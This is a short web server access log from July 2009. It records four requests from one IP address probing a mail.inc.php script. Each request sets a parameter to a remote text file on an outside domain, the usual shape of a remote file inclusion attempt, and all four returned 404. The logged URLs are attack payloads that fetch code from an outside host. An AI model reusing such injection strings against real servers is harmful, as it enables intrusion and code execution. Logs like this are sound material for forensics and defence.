83.98.209.71 - - [10/Jul/2009:00:39:09 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
83.98.209.71 - - [10/Jul/2009:00:39:09 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
83.98.209.71 - - [10/Jul/2009:00:39:09 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
83.98.209.71 - - [10/Jul/2009:00:39:09 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
